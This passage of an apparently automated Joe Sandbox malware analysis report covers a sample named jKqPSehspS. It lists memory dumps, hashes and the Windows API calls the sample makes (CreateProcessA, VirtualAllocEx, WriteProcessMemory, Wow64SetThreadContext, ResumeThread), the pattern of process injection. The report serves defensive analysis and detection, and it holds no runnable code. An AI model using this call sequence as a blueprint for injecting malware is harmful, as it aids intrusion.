                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079472A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: ab27eba216825dcc0fe95ef6d9752c645f884a8a00c66bcbad0c2a2eb6b7d101
                                                              • Instruction ID: dbde1f3bf1f949ef734a536a259be78dec2470dc7fb0170d75e8a6fde65239b1
                                                              • Opcode Fuzzy Hash: ab27eba216825dcc0fe95ef6d9752c645f884a8a00c66bcbad0c2a2eb6b7d101
                                                              • Instruction Fuzzy Hash: C2913CB1D0071ADFEB24CFA8C841BDDBBB6BB48314F1485A9D808A7280DB759985CF91

                                                              Control-flow Graph

control_flow_graph (basic-block edge list and executed/not-executed colouring omitted; drawn interactively in the original report): function at 150b0d0, blocks numbered 115-171 spanning 150b0d0-150b350; internal calls to 1509ad4, 150b358 or 150b368, 150aab4, 150aac4, 150aad4 and 150aae4; the only API call is GetModuleHandleW in block 150b308-150b333.
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: a5f6f1bacfea429dcc286d593b5d437ad97b4e9b59bdcbd680acfcb85ab6fe43
                                                              • Instruction ID: 857652ef3b495040d0a9f25448bd821420d2bcdca7f5b87edbb1b1d21e61237c
                                                              • Opcode Fuzzy Hash: a5f6f1bacfea429dcc286d593b5d437ad97b4e9b59bdcbd680acfcb85ab6fe43
                                                              • Instruction Fuzzy Hash: 3A717974A00B058FEB25CFA9D48479BBBF5FF88200F10892ED44ADBA91D774E945CB90

                                                              Control-flow Graph

control_flow_graph (basic-block edge list and executed/not-executed colouring omitted; drawn interactively in the original report): function at 15044b4, blocks numbered 172-188 spanning 15044b4-1505a41; the only API call is CreateActCtxA in the entry block 15044b4-15059b9, whose two successors are 15059bb-15059c1 and 15059c2-1505a1c.
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0

                                                              Control-flow Graph
                                                              • Basic-block graph 15058ed-1505a41; CreateActCtxA is called from the entry block 15058ed-15059b9
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946de0-7946ebe; WriteProcessMemory is called from block 7946e46-7946e85
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07946E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946de8-7946ebe; WriteProcessMemory is called from block 7946e46-7946e85
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07946E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946ed0-7946f9e; ReadProcessMemory is called from the entry block 7946ed0-7946f65
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07946F58
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946c49-7946d14; Wow64SetThreadContext is called from block 7946cab-7946cdb
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07946CCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0

                                                              Control-flow Graph
                                                              • Basic-block graph 150cc40-150d65a; DuplicateHandle is called from the entry block 150cc40-150d634
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D566,?,?,?,?,?), ref: 0150D627
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946ed8-7946f9e; ReadProcessMemory is called from the entry block 7946ed8-7946f65
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07946F58
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946c50-7946d14; Wow64SetThreadContext is called from block 7946cab-7946cdb
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07946CCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0

                                                              Control-flow Graph
                                                              • Basic-block graph 150d599-150d65a; DuplicateHandle is called from the entry block 150d599-150d634
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D566,?,?,?,?,?), ref: 0150D627
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946d20-7946dd1; VirtualAllocEx is called from the entry block 7946d20-7946da3
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07946D96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0

                                                              Control-flow Graph
                                                              • Basic-block graph 7946d28-7946dd1; VirtualAllocEx is called from the entry block 7946d28-7946da3
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07946D96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0794AF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1529571127.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14bd000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1529571127.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14bd000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Execution Graph

Execution Coverage: 12.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 19
Total number of Limit Nodes: 4
Memory Dump Source
• Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

Memory Dump Source
• Source File: 00000009.00000002.3959512169.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6ae0000_jKqPSehspS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 06AEEA9F
Memory Dump Source
• Source File: 00000009.00000002.3959512169.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6ae0000_jKqPSehspS.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0

                                                              Control-flow Graph
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4365fbf122b4b69002e81e0a51c1ea38e14075c41eb6962dcd9d0b1ad5392a29
                                                              • Instruction ID: 0b6f9d88ecdf2ff3a87f21b95c935393bfeec6b0348244d3ae19614bc365d005
                                                              • Opcode Fuzzy Hash: 4365fbf122b4b69002e81e0a51c1ea38e14075c41eb6962dcd9d0b1ad5392a29
                                                              • Instruction Fuzzy Hash: 65226D30B012069BDB26AB7CE4946AC33A6FBC9651B104E3DE205CB795DF71EC96C781

                                                              Control-flow Graph
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5e3141a2d46677982b440f7f4f0dcb9b5d6a935496030f5dc46f3740121c9a4
                                                              • Instruction ID: 13003609e96e3b3a303b63afeb67603f065725a2bc16ae9a981cb55f4ccc2f09
                                                              • Opcode Fuzzy Hash: c5e3141a2d46677982b440f7f4f0dcb9b5d6a935496030f5dc46f3740121c9a4
                                                              • Instruction Fuzzy Hash: 65125E30B012079BDB26AA7CE4946AC33A6FBC9651B144E3DE205CB785DF71EC96C781

                                                              Control-flow Graph
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 978dcb6f15727d63279a48a8f21562d7831e17751062a483ea03d6144a123d3b
                                                              • Instruction ID: fde7e6b468df2da5b8d48f4ff3b7026bb7ac96068c0b9d4e633e41e2eb7d448e
                                                              • Opcode Fuzzy Hash: 978dcb6f15727d63279a48a8f21562d7831e17751062a483ea03d6144a123d3b
                                                              • Instruction Fuzzy Hash: 2DE19434B1020A8FDF15DB68D8946ADBBB6FF88310F244529E606E7391DB35DD82CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2852a698de512d545e6b1d1cfab558b2a03cae3d58a1ad50f7499dbfd0970664
                                                              • Instruction ID: 654148d0eeb66cae2f20c39afe300636b83b1796dd229676195e6ae699828508
                                                              • Opcode Fuzzy Hash: 2852a698de512d545e6b1d1cfab558b2a03cae3d58a1ad50f7499dbfd0970664
                                                              • Instruction Fuzzy Hash: 23A17E70E1024ACFDB10EFA9C8817DDBBF9AF98314F148129D954EB394EB759885CB81
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0e702116af5184ae942a24100a35f5131688de28ab1168dbb8d35df708a1f40
                                                              • Instruction ID: 12ebb361db001d9f6f9e0d99d6a641b621fd500418e82e2aa26ca58d9415254a
                                                              • Opcode Fuzzy Hash: e0e702116af5184ae942a24100a35f5131688de28ab1168dbb8d35df708a1f40
                                                              • Instruction Fuzzy Hash: 12A19C70E1025ACFDF14DFA8C8817DEBBF6BF98314F148129E558A7294EB749885CB81
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5dd1fbefae413a4059a8d53a894d796446fed1d8fa3e3245020cd6239c380eff
                                                              • Instruction ID: 4ebc42dcf827c366e4223afdcd9e81534fca17e07e6fc8b5beb247243e78f3b6
                                                              • Opcode Fuzzy Hash: 5dd1fbefae413a4059a8d53a894d796446fed1d8fa3e3245020cd6239c380eff
                                                              • Instruction Fuzzy Hash: 5E71A170E10389DFDB14EFA9C8807DEBBF6BF88314F148129E554A7290DB749881CB85
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7d685b077cde28db2b98e809cde6f187ee677323f32f79509421f691473d126
                                                              • Instruction ID: c47eb8848b9b79f3b26b0389e02096913266f8d889d2d0569f35d602a5191ba0
                                                              • Opcode Fuzzy Hash: e7d685b077cde28db2b98e809cde6f187ee677323f32f79509421f691473d126
                                                              • Instruction Fuzzy Hash: D8719E70E1028ADFDB10EFA9C8857DEBBF6BF88314F148129E554A7290DB749881CF95
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa660d8cf67f89759995ee80d0060e2e8e9d45d6cdd8348d4bf5ece4757369c6
                                                              • Instruction ID: 3d33e9b35c4dcd7482592c6b3deb317bbf6c24b2a58b8f85fd2f71cb5df62447
                                                              • Opcode Fuzzy Hash: aa660d8cf67f89759995ee80d0060e2e8e9d45d6cdd8348d4bf5ece4757369c6
                                                              • Instruction Fuzzy Hash: F6519034720215CFDB14DB68D558AAE7BB6EF88704F204069E506EB3E1DB75DC81CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55fd12535522dc000a567da895979468eb017d5963764b760f22d4635bb5880c
                                                              • Instruction ID: 0c35c56774f8bef8cee9fe85789331bdc9280417651473077bab89127478548c
                                                              • Opcode Fuzzy Hash: 55fd12535522dc000a567da895979468eb017d5963764b760f22d4635bb5880c
                                                              • Instruction Fuzzy Hash: 12513975A00209CFDB14DFA9E884799FBB5FF88310F14C2BAE9089B395E7709945CB90
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4824d131b9d100d55d64e3bea8b086aefcaa836a5e10196b786c1990d605f16
                                                              • Instruction ID: 8d9ca32ccd1bdd72b45d3e9102e26e2099b2039f590a022ab3e244596d25f9fb
                                                              • Opcode Fuzzy Hash: e4824d131b9d100d55d64e3bea8b086aefcaa836a5e10196b786c1990d605f16
                                                              • Instruction Fuzzy Hash: E4512370D202198FDB18CFA9C895B9DFBF5BF48304F18811AD915AB391D774A884CB95
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4210274cda1f5ddf2a49add76a7b1b316ef7f84dffffd50dde84569808570ed
                                                              • Instruction ID: d33d7315801fce67d16c270651db49a2971e46475cfbdf7f114ec33a9109dea9
                                                              • Opcode Fuzzy Hash: e4210274cda1f5ddf2a49add76a7b1b316ef7f84dffffd50dde84569808570ed
                                                              • Instruction Fuzzy Hash: 5B512270D20219CFDB18CFA9C889B9DBBF5BF48314F14812AE915AB391D774A884CF95
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f85633f53773fb41febd79223f1ea13f3211812a651fc1796aa899d9bc10722e
                                                              • Instruction ID: 93f2e2013724786da31db6fc31bb7595f5268200a9eb68e045b9109a07026ff7
                                                              • Opcode Fuzzy Hash: f85633f53773fb41febd79223f1ea13f3211812a651fc1796aa899d9bc10722e
                                                              • Instruction Fuzzy Hash: 01510270D20219CFDB18CFA9C889B9DBBF5BF48314F14812AE915AB391D774A884CF95
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 772d786ef42762038d10fa59de5eeecb3fd063cff266530b3f726fbdc6d76e2b
                                                              • Instruction ID: b175700fe2981acb64233297f009aa021ad3446e6e72a59fbe59dff7ceb302fb
                                                              • Opcode Fuzzy Hash: 772d786ef42762038d10fa59de5eeecb3fd063cff266530b3f726fbdc6d76e2b
